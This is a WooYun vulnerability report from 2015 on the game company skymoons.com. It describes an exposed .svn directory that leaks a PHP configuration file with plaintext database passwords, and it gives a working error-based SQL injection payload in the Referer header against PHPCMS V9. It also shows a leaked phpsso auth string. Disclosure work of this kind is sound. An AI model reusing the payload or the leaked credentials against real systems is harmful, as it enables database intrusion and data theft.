当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131346

漏洞标题:天象互动游戏漏洞打包(SQL注入漏洞/数据库敏感信息泄露等)

相关厂商:skymoons.com

漏洞作者: M4sk

提交时间:2015-08-17 17:53

修复时间:2015-09-29 18:10

公开时间:2015-09-29 18:10

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-17: 细节已通知厂商并且等待厂商处理中
2015-08-15: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-25: 细节向核心白帽子及相关领域专家公开
2015-09-04: 细节向普通白帽子公开
2015-09-14: 细节向实习白帽子公开
2015-09-29: 细节向公众公开

简要描述:

RT

详细说明:

# 1 :SVN信息泄露 导致 数据库敏感信息泄露
http://**.**.**.**/.svn/entries
http://**.**.**.**/.svn/entries

1.png


/*主表配置*/
'DB'=>array(
'main'=>array(
'slaves'=>array(
'connectionString' => 'mysql:host=**.**.**.**;dbname=sdk_dev',
'masterRead' => false, //从库无效时 从主库读取
'username' => 'sdk_dev',
'password' => 'sdk_dev@2014',
'charset' => 'utf8',
'tablePrefix' => '',
),
'master'=>array(
'connectionString' => 'mysql:host=**.**.**.**;dbname=sdk_dev',
'slavesWrite' => false,
'username' => 'sdk_dev',
'password' => 'sdk_dev@2014',
'charset' => 'utf8',
'tablePrefix' => '',
),
),
//其他库
'localhost'=>array(
'slaves'=>array(
'connectionString' => 'mysql:host=**.**.**.**;dbname=wiki',
'masterRead' => true,
'username' => 'root',
'password' => '123456',
'charset' => 'utf8',
'tablePrefix' => 'wiki_',
),
'master'=>array(
'connectionString' => 'mysql:host=**.**.**.**;dbname=wiki',
'slavesWrite' => true,
'username' => 'root',
'password' => '123456',
'charset' => 'utf8',
'tablePrefix' => 'wiki_',
),
),

//251
'test251'=>array(
'slaves'=>array(
'connectionString' => 'mysql:host=**.**.**.**;dbname=wiki',
'masterRead' => true,
'username' => 'chenchao',
'password' => '123456',
'charset' => 'utf8',
'tablePrefix' => 'wiki_',
),
'master'=>array(
'connectionString' => 'mysql:host=**.**.**.**;dbname=wiki',
'slavesWrite' => true,
'username' => 'chenchao',
'password' => '123456',
'charset' => 'utf8',
'tablePrefix' => 'wiki_',
),
),


//251
'cskl251'=>array(
'slaves'=>array(
'connectionString' => 'mysql:host=**.**.**.**;dbname=cskl',
'masterRead' => true,
'username' => 'chenchao',
'password' => '123456',
'charset' => 'utf8',
'tablePrefix' => '',
),
'master'=>array(
'connectionString' => 'mysql:host=**.**.**.**;dbname=cskl',
'slavesWrite' => true,
'username' => 'chenchao',
'password' => '123456',
'charset' => 'utf8',
'tablePrefix' => '',
),
),

'jorgame'=>array(
'slaves'=>array(
'connectionString' => 'mysql:host=**.**.**.**;port=8904;dbname=sdklog',
'masterRead' => true,
'username' => 'root',
'password' => 'zr_123',
'charset' => 'utf8',
'tablePrefix' => '',
),
'master'=>array(
'connectionString' => 'mysql:host=**.**.**.**;port=8904;dbname=sdklog',
'masterRead' => true,
'username' => 'root',
'password' => 'zr_123',
'charset' => 'utf8',
'tablePrefix' => '',
),
),

'jorgamecom'=>array(
'slaves'=>array(
'connectionString' => 'mysql:host=**.**.**.**;port=8904;dbname=sdkcom',
'masterRead' => true,
'username' => 'root',
'password' => 'zr_123',
'charset' => 'utf8',
'tablePrefix' => '',
),
'master'=>array(
'connectionString' => 'mysql:host=**.**.**.**;port=8904;dbname=sdkcom',
'masterRead' => true,
'username' => 'root',
'password' => 'zr_123',
'charset' => 'utf8',
'tablePrefix' => '',
),
),

'tianxiangios'=>array(
'slaves'=>array(
'connectionString' => 'mysql:host=**.**.**.**;port=4302;dbname=andsdk',
'masterRead' => true,
'username' => 'root',
'password' => 'GYqoNsfPBlkAcVczTw',
'charset' => 'utf8',
'tablePrefix' => '',
),
'master'=>array(
'connectionString' => 'mysql:host=**.**.**.**;port=4302;dbname=andsdk',
'masterRead' => true,
'username' => 'root',
'password' => 'GYqoNsfPBlkAcVczTw',
'charset' => 'utf8',
'tablePrefix' => '',
),
),

),

/*视图配置*/
'TEMPLATE'=>array(

//smarty模板
'smarty' => array(
'TEMPLATE_PATH'=> APP_PATH.'/vendors/smarty/libs/Smarty.class.php',
'CONF_INFO'=>array(
'template_dir' => APP_PATH.'/application/views/default', #模板目录
'compile_dir' => APP_PATH.'/__runtime/script', #编译目录
'cache_dir' => APP_PATH.'/__runtime/html',
'left_delimiter' => '<{',
'right_delimiter' => '}>',
'allow_php_tag' => true,
'caching'=>false,
'cache_lifetime'=>100,
)
),


),


2.png


# 2 : PHPCMS V9 的一个referer 注入
url:http://**.**.**.**//index.php?m=poster&c=index&a=poster_click&id=1
Referer:',(SELECT 1 FROM(SELECT COUNT(*),CONCAT(user(),FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a),'1')#

4.png

5.png


# 3 : 一个skey的泄露
http://**.**.**.**/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ
乌云有相关的利用文章 我就不演示了
http://**.**.**.**/bugs/wooyun-2015-0105242
该去吃饭了~~

漏洞证明:

综上

修复方案:

自查

版权声明:转载请注明来源 M4sk@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-08-15 18:08

厂商回复:

感谢对我们安全工作的关心!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-03 23:30 | M4sk ( 普通白帽子 | Rank:1213 漏洞数:321 | 国内信息安全任重而道远,还需要厂商和白帽...)

    额 这个咋交由CNcert处理了~